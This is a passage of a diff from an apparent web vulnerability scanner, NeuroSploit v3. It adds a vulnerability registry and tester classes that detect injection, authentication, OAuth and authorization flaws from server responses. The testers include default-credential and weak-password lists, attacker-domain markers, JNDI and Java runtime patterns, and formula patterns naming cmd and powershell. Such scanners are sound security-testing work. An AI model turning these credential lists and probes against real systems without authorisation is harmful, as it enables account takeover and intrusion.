"rest_api_versioning": {"title": "Insecure API Version Exposure", "severity": "low", "cwe_id": "CWE-284", "description": "Older API versions with weaker security controls still accessible.", "impact": "Bypass newer security controls via old API versions.", "remediation": "1. Deprecate and remove old API versions\n2. Apply same security to all versions\n3. Monitor old version usage\n4. Set deprecation timelines"},
"soap_injection": {"title": "SOAP/XML Web Service Injection", "severity": "high", "cwe_id": "CWE-91", "description": "Injection in SOAP/XML web service parameters manipulating queries.", "impact": "Data extraction, XXE via SOAP, SOAP action spoofing for unauthorized operations.", "remediation": "1. Validate SOAP input\n2. Disable XML external entities\n3. Validate SOAPAction header\n4. Use WS-Security"},
"api_rate_limiting": {"title": "Missing API Rate Limiting", "severity": "medium", "cwe_id": "CWE-770", "description": "API endpoints lacking rate limiting allowing unlimited requests.", "impact": "Brute force, scraping, DoS, API abuse at scale.", "remediation": "1. Implement rate limiting per user/IP\n2. Return 429 with Retry-After\n3. Use API gateway throttling\n4. Implement sliding window algorithm"},
"excessive_data_exposure": {"title": "Excessive Data Exposure", "severity": "medium", "cwe_id": "CWE-213", "description": "APIs returning more data than the client needs, including sensitive fields.", "impact": "Exposure of sensitive fields (password hashes, tokens, PII) to clients.", "remediation": "1. Use response DTOs/serializers\n2. Implement field-level filtering\n3. Apply least-data principle\n4. Separate admin and user endpoints"}
}
# Tester class mappings
# Tester class mappings (100 types)
TESTER_CLASSES = {
# Injection (10 original + 11 advanced)
"xss_reflected": XSSReflectedTester,
"xss_stored": XSSStoredTester,
"xss_dom": XSSDomTester,
@@ -338,26 +458,118 @@ class VulnerabilityRegistry:
"command_injection": CommandInjectionTester,
"ssti": SSTITester,
"nosql_injection": NoSQLInjectionTester,
"ldap_injection": LdapInjectionTester,
"xpath_injection": XpathInjectionTester,
"graphql_injection": GraphqlInjectionTester,
"crlf_injection": CrlfInjectionTester,
"header_injection": HeaderInjectionTester,
"email_injection": EmailInjectionTester,
"expression_language_injection": ELInjectionTester,
"log_injection": LogInjectionTester,
"html_injection": HtmlInjectionTester,
"csv_injection": CsvInjectionTester,
"orm_injection": OrmInjectionTester,
# XSS Advanced
"blind_xss": XSSStoredTester, # Similar detection pattern
"mutation_xss": XSSReflectedTester, # Similar detection pattern
# File Access (5 original + 3 new)
"lfi": LFITester,
"rfi": RFITester,
"path_traversal": PathTraversalTester,
"xxe": XXETester,
"file_upload": FileUploadTester,
"arbitrary_file_read": ArbitraryFileReadTester,
"arbitrary_file_delete": ArbitraryFileDeleteTester,
"zip_slip": ZipSlipTester,
# Request Forgery (3 original + 2 new)
"ssrf": SSRFTester,
"ssrf_cloud": SSRFTester, # Same tester, different payloads
"ssrf_cloud": SSRFTester,
"csrf": CSRFTester,
"cors_misconfig": CORSTester,
"graphql_introspection": GraphqlIntrospectionTester,
"graphql_dos": GraphqlDosTester,
# Auth (3 original + 5 new)
"auth_bypass": AuthBypassTester,
"jwt_manipulation": JWTManipulationTester,
"session_fixation": SessionFixationTester,
"weak_password": WeakPasswordTester,
"default_credentials": DefaultCredentialsTester,
"brute_force": AuthBypassTester, # Similar pattern
"two_factor_bypass": TwoFactorBypassTester,
"oauth_misconfiguration": OauthMisconfigTester,
# Authorization (3 original + 3 new)
"idor": IDORTester,
"bola": BOLATester,
"privilege_escalation": PrivilegeEscalationTester,
"cors_misconfig": CORSTester,
"bfla": BflaTester,
"mass_assignment": MassAssignmentTester,
"forced_browsing": ForcedBrowsingTester,
# Client-Side (3 original + 6 new)
"clickjacking": ClickjackingTester,
"open_redirect": OpenRedirectTester,
"dom_clobbering": DomClobberingTester,
"postmessage_vulnerability": PostMessageVulnTester,
"websocket_hijacking": WebsocketHijackTester,
"prototype_pollution": PrototypePollutionTester,
"css_injection": CssInjectionTester,
"tabnabbing": TabnabbingTester,
# Infrastructure (3 original + 7 new)
"security_headers": SecurityHeadersTester,
"ssl_issues": SSLTester,
"http_methods": HTTPMethodsTester,
"directory_listing": DirectoryListingTester,
"debug_mode": DebugModeTester,
"exposed_admin_panel": ExposedAdminPanelTester,
"exposed_api_docs": ExposedApiDocsTester,
"insecure_cookie_flags": InsecureCookieFlagsTester,
"http_smuggling": HttpSmugglingTester,
"cache_poisoning": CachePoisoningTester,
# Logic (9 types)
"race_condition": RaceConditionTester,
"business_logic": BusinessLogicTester,
"rate_limit_bypass": RateLimitBypassTester,
"parameter_pollution": ParameterPollutionTester,
"type_juggling": TypeJugglingTester,
"timing_attack": TimingAttackTester,
"host_header_injection": HostHeaderInjectionTester,
"insecure_deserialization": BaseTester, # AI-driven
"subdomain_takeover": SubdomainTakeoverTester,
"improper_error_handling": BaseTester, # AI-driven
# Data Exposure (6 types)
"sensitive_data_exposure": SensitiveDataExposureTester,
"information_disclosure": InformationDisclosureTester,
"api_key_exposure": ApiKeyExposureTester,
"source_code_disclosure": SourceCodeDisclosureTester,
"backup_file_exposure": BackupFileExposureTester,
"version_disclosure": VersionDisclosureTester,
# Crypto & Supply (8 types - mostly inspection/AI-driven)
"weak_encryption": BaseTester,
"weak_hashing": BaseTester,
"weak_random": BaseTester,
"cleartext_transmission": BaseTester,
"vulnerable_dependency": VulnerableDependencyTester,
"outdated_component": VulnerableDependencyTester,
"insecure_cdn": BaseTester,
"container_escape": ContainerEscapeTester,
# Cloud & API (7 types)
"s3_bucket_misconfiguration": S3BucketMisconfigTester,
"cloud_metadata_exposure": CloudMetadataExposureTester,
"serverless_misconfiguration": ServerlessMisconfigTester,
"rest_api_versioning": BaseTester, # AI-driven
"soap_injection": BaseTester, # AI-driven
"api_rate_limiting": RateLimitBypassTester,
"excessive_data_exposure": SensitiveDataExposureTester,
}
def __init__(self):
File diff suppressed because it is too large Load Diff
@@ -0,0 +1,532 @@
"""
NeuroSploit v3 - Advanced Injection Vulnerability Testers
Testers for LDAP, XPath, GraphQL, CRLF, Header, Email, EL, Log, HTML, CSV, and ORM injection.
"""
import re
from typing import Tuple, Dict, Optional
from backend.core.vuln_engine.testers.base_tester import BaseTester
class LdapInjectionTester(BaseTester):
"""Tester for LDAP Injection vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "ldap_injection"
self.error_patterns = [
r"javax\.naming\.NamingException",
r"LDAPException",
r"ldap_search\(\)",
r"ldap_bind\(\)",
r"Invalid DN syntax",
r"Bad search filter",
r"DSA is unavailable",
r"LDAP error code \d+",
r"cn=.*,\s*ou=.*,\s*dc=",
r"objectClass=",
r"No such object",
r"invalid attribute description",
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for LDAP injection indicators"""
# Check for LDAP error messages
for pattern in self.error_patterns:
match = re.search(pattern, response_body, re.IGNORECASE)
if match:
return True, 0.8, f"LDAP error detected: {match.group(0)[:100]}"
# Wildcard injection - check if directory listing returned
if "*" in payload:
# Multiple DN entries suggest directory enumeration
dn_count = len(re.findall(r"dn:\s+\S+", response_body, re.IGNORECASE))
if dn_count > 1:
return True, 0.85, f"LDAP wildcard returned {dn_count} directory entries"
# Filter manipulation - check for unexpected data volume
if ")(|" in payload or "*)(objectClass" in payload:
if response_status == 200 and len(response_body) > 5000:
return True, 0.6, "LDAP filter manipulation may have returned extra data"
return False, 0.0, None
class XpathInjectionTester(BaseTester):
"""Tester for XPath Injection vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "xpath_injection"
self.error_patterns = [
r"XPathException",
r"Invalid XPath",
r"xpath syntax error",
r"javax\.xml\.xpath",
r"XPathEvalError",
r"xmlXPathEval:",
r"XPATH syntax error",
r"DOMXPath",
r"SimpleXMLElement::xpath\(\)",
r"lxml\.etree\.XPathEvalError",
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for XPath injection indicators"""
# XPath error messages
for pattern in self.error_patterns:
match = re.search(pattern, response_body, re.IGNORECASE)
if match:
return True, 0.85, f"XPath error detected: {match.group(0)[:100]}"
# Boolean-based XPath injection - true condition returning data
if ("' or '1'='1" in payload or "or 1=1" in payload):
if response_status == 200:
# Check for XML-like data in response
xml_tags = re.findall(r"<[a-zA-Z][^>]*>", response_body)
if len(xml_tags) > 5:
return True, 0.65, "XPath boolean injection may have returned XML data"
# Check for exposed XML node data
if "' | //" in payload or "extractvalue(" in payload.lower():
if re.search(r"<\?xml\s+version=", response_body):
return True, 0.7, "XML document exposed via XPath injection"
return False, 0.0, None
class GraphqlInjectionTester(BaseTester):
"""Tester for GraphQL Injection / Introspection vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "graphql_injection"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for GraphQL introspection and injection indicators"""
body_lower = response_body.lower()
# Introspection query response - schema exposure
if "__schema" in payload or "__type" in payload or "introspection" in payload.lower():
if '"__schema"' in response_body or '"__type"' in response_body:
return True, 0.9, "GraphQL introspection enabled - schema exposed"
if '"types"' in response_body and '"queryType"' in response_body:
return True, 0.9, "GraphQL schema types exposed via introspection"
# GraphQL error messages revealing structure
graphql_errors = [
r'"errors"\s*:\s*\[',
r"Cannot query field",
r"Unknown argument",
r"Field .* not found in type",
r"Syntax Error.*GraphQL",
r"GraphQL error",
]
for pattern in graphql_errors:
if re.search(pattern, response_body, re.IGNORECASE):
# Error messages can reveal field/type names
if re.search(r'"message"\s*:\s*".*(?:field|type|argument)', response_body, re.IGNORECASE):
return True, 0.7, "GraphQL error reveals schema information"
# Mutation that returned success unexpectedly
if "mutation" in payload.lower() and response_status == 200:
if '"data"' in response_body and '"errors"' not in response_body:
return True, 0.5, "GraphQL mutation succeeded - verify authorization"
return False, 0.0, None
class CrlfInjectionTester(BaseTester):
"""Tester for CRLF Injection vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "crlf_injection"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for CRLF injection - injected headers appearing in response"""
# Check if our injected header appeared in response headers
headers_lower = {k.lower(): v for k, v in response_headers.items()}
if "x-test" in headers_lower:
return True, 0.95, f"CRLF injection confirmed: X-Test header injected with value '{headers_lower['x-test']}'"
if "x-injected" in headers_lower:
return True, 0.95, f"CRLF injection confirmed: X-Injected header present"
# Check for Set-Cookie injection
if "set-cookie" in headers_lower and "neurosploit" in str(headers_lower.get("set-cookie", "")).lower():
return True, 0.9, "CRLF injection: injected Set-Cookie header detected"
# Check if payload characters are reflected unencoded in Location header
if "location" in headers_lower:
location = headers_lower["location"]
if "\r\n" in location or "%0d%0a" in location.lower():
return True, 0.8, "CRLF characters in Location header"
return False, 0.0, None
class HeaderInjectionTester(BaseTester):
"""Tester for Host Header Injection vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "header_injection"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for Host header reflected in response URLs"""
body_lower = response_body.lower()
# Check if injected host value appears in response links
evil_markers = ["evil.com", "attacker.com", "neurosploit.test"]
for marker in evil_markers:
if marker in payload.lower():
if marker in body_lower:
# Check if it appears in URLs, links, or redirects
url_pattern = rf'(?:href|src|action|url|link|redirect)\s*[=:]\s*["\']?[^"\']*{re.escape(marker)}'
if re.search(url_pattern, response_body, re.IGNORECASE):
return True, 0.9, f"Host header injected into response URL: {marker}"
return True, 0.7, f"Injected host value '{marker}' reflected in response"
# Password reset poisoning check
if "password" in body_lower and "reset" in body_lower:
headers_lower = {k.lower(): v for k, v in response_headers.items()}
if response_status in [200, 302]:
return True, 0.5, "Password reset response may use Host header for link generation"
return False, 0.0, None
class EmailInjectionTester(BaseTester):
"""Tester for Email Header Injection vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "email_injection"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for email header injection success indicators"""
body_lower = response_body.lower()
# Check for CC/BCC injection indicators
if any(h in payload.lower() for h in ["cc:", "bcc:", "\r\nto:", "%0acc:", "%0abcc:"]):
# Successful email send with injected headers
if response_status == 200:
success_indicators = [
"email sent", "message sent", "mail sent",
"successfully sent", "email delivered", "sent successfully",
]
for indicator in success_indicators:
if indicator in body_lower:
return True, 0.75, f"Email injection: '{indicator}' after CC/BCC injection attempt"
# Check for multiple recipient confirmation
if re.search(r"(?:sent to|delivered to|recipients?)\s*:?\s*\d+", response_body, re.IGNORECASE):
return True, 0.7, "Email sent to multiple recipients after injection"
# SMTP error leak
smtp_errors = [r"SMTP error", r"550 \d+", r"relay access denied", r"mail\(\).*failed"]
for pattern in smtp_errors:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.6, "SMTP error revealed - email injection attempted"
return False, 0.0, None
class ELInjectionTester(BaseTester):
"""Tester for Expression Language (EL) Injection vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "el_injection"
self.math_results = {
"${7*7}": "49",
"#{7*7}": "49",
"${3*11}": "33",
"#{3*11}": "33",
}
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for EL injection - expression evaluation in response"""
# Check mathematical expression results
for expr, result in self.math_results.items():
if expr in payload and result in response_body:
# Make sure the result isn't just the expression echoed
if expr not in response_body:
return True, 0.95, f"EL injection confirmed: {expr} evaluated to {result}"
# Java class names exposed via EL
java_indicators = [
r"java\.lang\.\w+",
r"java\.io\.File",
r"Runtime\.getRuntime",
r"ProcessBuilder",
r"javax\.\w+\.\w+",
r"org\.apache\.\w+",
r"getClass\(\)\.forName",
]
for pattern in java_indicators:
if re.search(pattern, response_body):
return True, 0.8, f"Java class exposure via EL injection: {pattern}"
# Spring EL specific
if "T(java.lang" in payload:
if re.search(r"class\s+\w+|java\.\w+", response_body):
return True, 0.7, "Spring EL injection indicator - Java class reference in response"
return False, 0.0, None
class LogInjectionTester(BaseTester):
"""Tester for Log Injection / Log4Shell / JNDI Injection vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "log_injection"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for log injection and JNDI callback indicators"""
# JNDI/Log4Shell detection via context callback
if "${jndi:" in payload.lower():
# Check context for callback confirmation
if context.get("callback_received"):
return True, 0.95, "JNDI injection confirmed via callback"
# Check for Log4j error in response
log4j_indicators = [
r"log4j", r"Log4jException", r"JNDI lookup",
r"javax\.naming", r"InitialContext",
]
for pattern in log4j_indicators:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.7, f"Log4j/JNDI indicator in response: {pattern}"
# Newline injection in log-like responses
if "\n" in payload or "%0a" in payload.lower() or "\\n" in payload:
# Check if response includes log-format lines with our injected content
log_patterns = [
r"\[\d{4}-\d{2}-\d{2}.*\].*neurosploit",
r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}.*neurosploit",
r"(?:INFO|WARN|ERROR|DEBUG)\s+.*neurosploit",
]
for pattern in log_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.7, "Log injection: injected content appears in log-format output"
# Generic log forging check
if "neurosploit" in payload and response_status == 200:
if re.search(r"(?:log|audit|event).*neurosploit", response_body, re.IGNORECASE):
return True, 0.5, "Injected marker appears in log/audit output"
return False, 0.0, None
class HtmlInjectionTester(BaseTester):
"""Tester for HTML Injection vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "html_injection"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for rendered HTML tags in response"""
if response_status >= 400:
return False, 0.0, None
# Check for injected HTML tags rendered in response
html_tests = [
(r"<b>neurosploit</b>", "Bold tag rendered"),
(r"<i>neurosploit</i>", "Italic tag rendered"),
(r"<u>neurosploit</u>", "Underline tag rendered"),
(r'<a\s+href=["\']?[^"\']*["\']?>neurosploit</a>', "Anchor tag rendered"),
(r'<img\s+src=["\']?[^"\']*["\']?', "Image tag rendered"),
(r'<form\s+[^>]*action=', "Form tag rendered"),
(r'<iframe\s+', "IFrame tag rendered"),
(r'<marquee>', "Marquee tag rendered"),
(r'<h1>neurosploit</h1>', "H1 tag rendered"),
(r'<div\s+style=', "Styled div rendered"),
]
for pattern, description in html_tests:
if re.search(pattern, response_body, re.IGNORECASE):
# Verify it wasn't already there (check if payload was actually injected)
if any(tag in payload.lower() for tag in ["<b>", "<i>", "<u>", "<a ", "<img", "<form", "<iframe", "<marquee", "<h1>", "<div"]):
return True, 0.8, f"HTML injection: {description}"
# Check for payload reflection without encoding
if "<" in payload and ">" in payload:
# Find the injected tag in response
tag_match = re.search(r"<(\w+)[^>]*>", payload)
if tag_match:
tag_name = tag_match.group(1)
if f"<{tag_name}" in response_body and f"&lt;{tag_name}" not in response_body:
return True, 0.75, f"HTML tag <{tag_name}> reflected without encoding"
return False, 0.0, None
class CsvInjectionTester(BaseTester):
"""Tester for CSV Injection (Formula Injection) vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "csv_injection"
self.formula_chars = ["=", "+", "-", "@", "\t", "\r"]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for formula characters preserved in CSV export responses"""
headers_lower = {k.lower(): v.lower() for k, v in response_headers.items()}
content_type = headers_lower.get("content-type", "")
# Check if response is CSV or spreadsheet
is_csv = "text/csv" in content_type or "spreadsheet" in content_type
is_export = "content-disposition" in headers_lower and any(
ext in headers_lower.get("content-disposition", "")
for ext in [".csv", ".xls", ".xlsx"]
)
if is_csv or is_export:
# Check if formula characters are preserved without escaping
for char in self.formula_chars:
if char in payload and payload in response_body:
return True, 0.8, f"CSV injection: formula character '{char}' preserved in export"
# Check for specific formula patterns
formula_patterns = [
r'[=+\-@].*(?:HYPERLINK|IMPORTXML|IMPORTDATA|cmd|powershell)',
r'=\w+\(.*\)',
]
for pattern in formula_patterns:
if re.search(pattern, response_body):
return True, 0.7, "CSV injection: formula pattern found in export data"
# Non-CSV response but payload was stored
if response_status in [200, 201] and any(c in payload for c in self.formula_chars[:4]):
if payload in response_body:
return True, 0.4, "Formula characters accepted and stored - verify CSV export"
return False, 0.0, None
class OrmInjectionTester(BaseTester):
"""Tester for ORM Injection vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "orm_injection"
self.error_patterns = [
r"Hibernate.*Exception",
r"javax\.persistence",
r"org\.hibernate",
r"ActiveRecord::.*Error",
r"Sequelize.*Error",
r"SQLAlchemy.*Error",
r"Doctrine.*Exception",
r"TypeORM.*Error",
r"Prisma.*Error",
r"EntityFramework.*Exception",
r"LINQ.*Exception",
r"django\.db.*Error",
r"peewee\.\w+Error",
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for ORM injection indicators"""
# ORM error messages
for pattern in self.error_patterns:
match = re.search(pattern, response_body, re.IGNORECASE)
if match:
return True, 0.8, f"ORM error detected: {match.group(0)[:100]}"
# Filter manipulation - unexpected data returned
if any(op in payload for op in ["__gt", "__lt", "__ne", "$ne", "$gt", ">=", "!="]):
if response_status == 200:
# Check context for baseline comparison
if "baseline_length" in context:
diff = abs(len(response_body) - context["baseline_length"])
if diff > 500:
return True, 0.6, f"ORM filter manipulation: response size differs by {diff} bytes"
# Check for data volume suggesting bypassed filters
if "__all" in payload or "objects.all" in payload:
if response_status == 200 and len(response_body) > 10000:
return True, 0.5, "ORM injection may have bypassed query filters - large data returned"
return False, 0.0, None
+223
View File
@@ -122,3 +122,226 @@ class SessionFixationTester(BaseTester):
return True, 0.6, "Session ID exposed in URL"
return False, 0.0, None
class WeakPasswordTester(BaseTester):
"""Tester for Weak Password acceptance"""
def __init__(self):
super().__init__()
self.name = "weak_password"
self.weak_passwords = [
"123456", "password", "12345678", "qwerty", "abc123",
"111111", "123123", "admin", "letmein", "welcome",
"1234", "1", "a"
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for successful login/registration with weak passwords"""
body_lower = response_body.lower()
# Check if payload contains a weak password
payload_has_weak = any(wp in payload for wp in self.weak_passwords)
if not payload_has_weak:
return False, 0.0, None
# Check for successful auth with weak password
if response_status in [200, 201, 302]:
success_indicators = [
r'"(?:access_)?token"\s*:', r'"session"\s*:',
r"(?:login|registration|signup)\s+successful",
r'"authenticated"\s*:\s*true', r'"success"\s*:\s*true',
r"welcome", r"dashboard", r"logged\s*in",
]
for pattern in success_indicators:
if re.search(pattern, response_body, re.IGNORECASE):
matched_pw = next((wp for wp in self.weak_passwords if wp in payload), "unknown")
return True, 0.85, f"Weak password accepted: '{matched_pw}' allowed for authentication"
# Redirect to authenticated area
location = response_headers.get("Location", "")
if response_status == 302 and any(x in location.lower() for x in ["dashboard", "home", "profile", "account"]):
matched_pw = next((wp for wp in self.weak_passwords if wp in payload), "unknown")
return True, 0.8, f"Weak password accepted: Redirect to authenticated area with '{matched_pw}'"
return False, 0.0, None
class DefaultCredentialsTester(BaseTester):
"""Tester for Default Credentials acceptance"""
def __init__(self):
super().__init__()
self.name = "default_credentials"
self.default_creds = [
("admin", "admin"), ("admin", "password"), ("admin", "admin123"),
("root", "root"), ("root", "toor"), ("root", "password"),
("administrator", "administrator"), ("admin", "1234"),
("test", "test"), ("guest", "guest"), ("user", "user"),
("admin", "changeme"), ("admin", "default"),
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for successful login with default credentials"""
body_lower = response_body.lower()
# Check if payload matches default creds
payload_lower = payload.lower()
matched_cred = None
for username, password in self.default_creds:
if username in payload_lower and password in payload_lower:
matched_cred = f"{username}/{password}"
break
if not matched_cred:
return False, 0.0, None
# Check for successful login
if response_status in [200, 201, 302]:
auth_success = [
r'"(?:access_)?token"\s*:', r'"session"\s*:',
r"(?:login|auth)\s+successful", r'"success"\s*:\s*true',
r'"authenticated"\s*:\s*true', r"welcome",
r"dashboard", r"admin\s*panel",
]
for pattern in auth_success:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.9, f"Default credentials accepted: {matched_cred}"
# Redirect to admin/dashboard
location = response_headers.get("Location", "")
if response_status == 302 and any(x in location.lower() for x in ["dashboard", "admin", "home", "panel"]):
return True, 0.85, f"Default credentials accepted: {matched_cred} (redirect to {location})"
return False, 0.0, None
class TwoFactorBypassTester(BaseTester):
"""Tester for Two-Factor Authentication Bypass"""
def __init__(self):
super().__init__()
self.name = "two_factor_bypass"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for authenticated access without completing 2FA"""
body_lower = response_body.lower()
# Check if we reached authenticated content without 2FA
if response_status == 200:
# Authenticated area indicators
auth_area_patterns = [
r"dashboard", r"my\s*account", r"profile",
r"settings", r"admin\s*panel", r'"user"\s*:\s*\{',
r'"email"\s*:\s*"[^"]+"', r'"role"\s*:',
]
# 2FA page indicators (we should NOT see these if bypassed)
twofa_page_patterns = [
r"(?:enter|verify)\s+(?:your\s+)?(?:otp|code|token|2fa)",
r"two.?factor", r"verification\s+code",
r"authenticator", r"sms\s+code",
]
has_auth_content = any(re.search(p, response_body, re.IGNORECASE) for p in auth_area_patterns)
is_twofa_page = any(re.search(p, response_body, re.IGNORECASE) for p in twofa_page_patterns)
if has_auth_content and not is_twofa_page:
# Check if payload suggests 2FA bypass attempt
bypass_indicators = [
"2fa", "otp", "mfa", "verify", "code",
"step2", "second", "challenge",
]
if any(bi in payload.lower() for bi in bypass_indicators):
return True, 0.85, "2FA bypass: Authenticated area accessed without completing 2FA"
# Direct navigation bypass
if context.get("skip_2fa") or context.get("direct_access"):
return True, 0.9, "2FA bypass: Direct navigation to authenticated page bypassed 2FA"
# Redirect skipping 2FA step
if response_status in [301, 302]:
location = response_headers.get("Location", "").lower()
if any(x in location for x in ["dashboard", "home", "account"]):
if "verify" not in location and "2fa" not in location and "otp" not in location:
return True, 0.7, "2FA bypass: Redirect to authenticated area skipping verification"
return False, 0.0, None
class OauthMisconfigTester(BaseTester):
"""Tester for OAuth Misconfiguration"""
def __init__(self):
super().__init__()
self.name = "oauth_misconfig"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for OAuth misconfiguration (open redirect, token leakage)"""
# Check for open redirect in OAuth flow
if response_status in [301, 302, 303, 307]:
location = response_headers.get("Location", "")
# External redirect in OAuth callback
if "redirect_uri" in payload.lower() or "callback" in payload.lower():
# Check if redirecting to attacker-controlled domain
evil_domains = ["evil.com", "attacker.com", "malicious.com"]
if any(domain in location for domain in evil_domains):
return True, 0.9, f"OAuth misconfig: Open redirect in OAuth flow to {location}"
# Check if arbitrary redirect_uri accepted
if payload in location:
return True, 0.85, "OAuth misconfig: Arbitrary redirect_uri accepted"
# Check for token in URL parameters (should be in fragment or POST)
if response_status in [200, 302]:
location = response_headers.get("Location", "")
# Token in query string instead of fragment
token_in_url = re.search(
r'[?&](?:access_token|token|code)=([A-Za-z0-9._-]+)',
location
)
if token_in_url:
return True, 0.8, "OAuth misconfig: Token/code exposed in URL query parameters"
# Token in response body URL
token_in_body = re.search(
r'(?:redirect|callback|return)["\']?\s*[:=]\s*["\']?https?://[^"\'>\s]*[?&]access_token=',
response_body, re.IGNORECASE
)
if token_in_body:
return True, 0.75, "OAuth misconfig: Access token in redirect URL"
# Check for missing state parameter (CSRF in OAuth)
if "state=" not in response_body and "state=" not in response_headers.get("Location", ""):
if re.search(r"(?:authorize|oauth|auth)\?", response_body, re.IGNORECASE):
return True, 0.6, "OAuth misconfig: Missing state parameter (CSRF risk)"
return False, 0.0, None
@@ -128,3 +128,166 @@ class PrivilegeEscalationTester(BaseTester):
return True, 0.7, f"Privilege escalation: Admin functionality '{func}' accessible"
return False, 0.0, None
class BflaTester(BaseTester):
"""Tester for Broken Function Level Authorization (BFLA)"""
def __init__(self):
super().__init__()
self.name = "bfla"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for admin functionality accessible to regular user"""
if response_status == 200:
# Admin-specific data patterns
admin_data_patterns = [
r'"users"\s*:\s*\[',
r'"all_users"\s*:',
r'"admin_settings"\s*:',
r'"system_config"\s*:',
r'"audit_log"\s*:',
r'"role"\s*:\s*"admin"',
r'"permissions"\s*:\s*\[',
r'"api_keys"\s*:\s*\[',
]
for pattern in admin_data_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
# Check if this was an admin endpoint accessed as regular user
admin_url_indicators = [
"/admin", "/manage", "/users", "/settings",
"/config", "/system", "/audit", "/logs",
]
if any(ind in payload.lower() for ind in admin_url_indicators):
return True, 0.85, f"BFLA: Admin data returned for non-admin request"
# Admin page content
admin_content = [
"user management", "system configuration", "admin dashboard",
"manage users", "all accounts", "server status",
"delete user", "create admin",
]
body_lower = response_body.lower()
for content in admin_content:
if content in body_lower:
return True, 0.8, f"BFLA: Admin functionality '{content}' accessible to regular user"
# Admin endpoint should return 403 for non-admin
if response_status not in [401, 403] and context.get("is_admin_endpoint"):
if response_status == 200:
return True, 0.7, "BFLA: Admin endpoint returned 200 instead of 403"
return False, 0.0, None
class MassAssignmentTester(BaseTester):
"""Tester for Mass Assignment vulnerability"""
def __init__(self):
super().__init__()
self.name = "mass_assignment"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for extra parameters being accepted and modifying model state"""
if response_status in [200, 201]:
# Check if privileged fields were accepted
privileged_fields = [
(r'"(?:is_)?admin"\s*:\s*true', "admin flag"),
(r'"role"\s*:\s*"admin"', "admin role"),
(r'"role"\s*:\s*"superuser"', "superuser role"),
(r'"verified"\s*:\s*true', "verified status"),
(r'"is_staff"\s*:\s*true', "staff flag"),
(r'"is_superuser"\s*:\s*true', "superuser flag"),
(r'"balance"\s*:\s*\d{4,}', "balance modification"),
(r'"credits"\s*:\s*\d{3,}', "credits modification"),
(r'"discount"\s*:\s*\d+', "discount field"),
(r'"price"\s*:\s*0', "price zeroed"),
]
# Check if payload attempted mass assignment
mass_assign_indicators = [
"admin", "role", "is_staff", "is_superuser",
"verified", "balance", "credits", "price", "discount",
]
payload_has_mass_assign = any(ind in payload.lower() for ind in mass_assign_indicators)
if payload_has_mass_assign:
for pattern, field_name in privileged_fields:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.85, f"Mass assignment: Privileged field '{field_name}' accepted and reflected"
# Check if response changed compared to baseline
if context.get("baseline_body"):
baseline = context["baseline_body"]
if response_body != baseline and len(response_body) > len(baseline):
return True, 0.6, "Mass assignment: Response differs from baseline after extra parameters"
return False, 0.0, None
class ForcedBrowsingTester(BaseTester):
"""Tester for Forced Browsing (direct access to restricted URLs)"""
def __init__(self):
super().__init__()
self.name = "forced_browsing"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for direct access to restricted URLs without proper authorization"""
# Should get 401/403/302 for restricted content, not 200
if response_status == 200:
# Sensitive content indicators
sensitive_patterns = [
(r"(?:admin|management)\s+(?:panel|dashboard|console)", "admin panel"),
